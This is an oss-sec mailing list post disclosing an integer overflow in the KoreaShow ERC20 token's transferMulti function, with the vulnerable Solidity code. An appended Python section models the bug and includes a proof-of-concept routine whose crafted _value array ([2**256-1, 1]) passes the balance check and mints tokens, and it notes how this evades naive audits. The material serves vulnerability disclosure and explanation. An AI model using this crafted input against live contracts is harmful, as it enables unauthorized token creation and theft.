oss-sec mailing list archives
erc20 contract KoreaShow bug
From: Qinghao Tang <luodalongde () gmail com>
Date: Thu, 10 May 2018 23:56:15 +0800
An integer overflow in the transferMulti function of a smart contract implementation for KoreaShow, an Ethereum ERC20 token, allows attackers to accomplish an unauthorized increase of digital assets via crafted _value parameters.

------------------------------------------------------------

Let's see where this issue is:

    pragma solidity ^0.4.18;

    // Minimal surrounding declarations, added so the posted excerpt compiles;
    // the original message shows only the transferMulti function.
    contract KoreaShow {
        mapping(address => uint256) public balanceOf;
        event Transfer(address indexed from, address indexed to, uint256 value);

        function transferMulti(address[] _to, uint256[] _value) public returns (uint256 amount) {
            require(_to.length == _value.length);
            uint8 len = uint8(_to.length);          // truncated to 8 bits: at most 255 entries are processed
            for (uint8 j; j < len; j++) {
                amount += _value[j];                // <------ here, crafted _value can make amount overflow
                                                    // (unchecked uint256 addition wraps modulo 2**256)
            }
            require(balanceOf[msg.sender] >= amount);   // passes when the wrapped sum is small
            for (uint8 i; i < len; i++) {
                address _toI = _to[i];
                uint256 _valueI = _value[i];
                balanceOf[_toI] += _valueI;
                balanceOf[msg.sender] -= _valueI;   // also unchecked: underflows once _valueI exceeds the balance
                Transfer(msg.sender, _toI, _valueI);
            }
        }
    }

---------------------------------------------------------------

If you can reproduce the issue, please give it a CVE ID and disclose this vulnerability officially, claiming that "Qinghao Tang" is the discoverer.
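The following is an added example and is not part of the original post or of the KoreaShow contract. It models the EVM's uint256 wrap-around arithmetic in Python and mirrors the posted transferMulti logic, so the effect of a crafted _value array can be traced offline: two entries of 2**256 - 1 and 1 sum to 0, the balance check passes, and the recipients end up holding tokens the sender never had. The same routine run with SafeMath-style checked add/sub shows where a fixed contract would revert. Account names (attacker, mule1, mule2, alice, bob, carol) and the starting balance of 100 are constructed sample data.

```python
# Added example, not part of the original oss-sec post: a Python model of the
# EVM's uint256 wrap-around arithmetic, used to show how crafted _value entries
# make transferMulti's running sum overflow, and how a checked sum stops it.
MASK = (1 << 256) - 1  # largest uint256 value


class Revert(Exception):
    """Stands in for a failed require() / a reverting transaction."""


def u256_add(a, b):
    """Unchecked EVM ADD: wraps modulo 2**256, like Solidity before 0.8."""
    return (a + b) & MASK


def u256_sub(a, b):
    """Unchecked EVM SUB: wraps modulo 2**256."""
    return (a - b) & MASK


def checked_add(a, b):
    """SafeMath-style add: reverts instead of wrapping."""
    c = a + b
    if c > MASK:
        raise Revert("addition overflow")
    return c


def checked_sub(a, b):
    """SafeMath-style sub: reverts instead of wrapping."""
    if b > a:
        raise Revert("subtraction underflow")
    return a - b


def transfer_multi(balances, sender, to, values, add=u256_add, sub=u256_sub):
    """Mirror of the posted transferMulti. With the default unchecked add/sub it
    behaves like the vulnerable contract; pass checked_add and checked_sub to get
    the fixed behaviour. Mutates `balances` in place and returns the `amount`
    the contract computed."""
    if len(to) != len(values):
        raise Revert("_to.length != _value.length")
    length = len(to) & 0xFF  # uint8(_to.length): entries beyond 255 are silently dropped
    amount = 0
    for j in range(length):
        amount = add(amount, values[j])
    if balances.get(sender, 0) < amount:
        raise Revert("insufficient balance")
    for i in range(length):
        balances[to[i]] = add(balances.get(to[i], 0), values[i])
        balances[sender] = sub(balances[sender], values[i])
    return amount


def batch_overflow_attack(balances, sender, mule1, mule2, checked=False):
    """Crafted call: _value = [2**256 - 1, 1] sums to 0 modulo 2**256, so the
    balance check passes. The first transfer hands mule1 2**256 - 1 tokens while
    the sender's balance wraps around; the second transfer restores it exactly."""
    add, sub = (checked_add, checked_sub) if checked else (u256_add, u256_sub)
    return transfer_multi(balances, sender, [mule1, mule2], [MASK, 1], add, sub)


if __name__ == "__main__":
    # Constructed sample state: the attacker legitimately owns 100 tokens.
    state = {"attacker": 100}
    amount = batch_overflow_attack(state, "attacker", "mule1", "mule2")
    print("computed amount:", amount)          # 0
    print("attacker:", state["attacker"])      # 100, unchanged
    print("mule1:", hex(state["mule1"]))       # 0xff...ff (2**256 - 1)
    print("mule2:", state["mule2"])            # 1
    try:
        batch_overflow_attack({"attacker": 100}, "attacker", "mule1", "mule2", checked=True)
    except Revert as e:
        print("checked version reverted:", e)  # addition overflow
```

Note that the recipients do not have to be attacker-controlled in any special way; any two addresses work, and the sender's own balance is left exactly as it was, so a naive audit of the sender's account shows nothing. The fixed path reverts in the summation loop before any balance is touched, which is the behaviour a SafeMath-based or Solidity >= 0.8 implementation gives.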
Current thread:
- erc20 contract KoreaShow bug Qinghao Tang (May 10)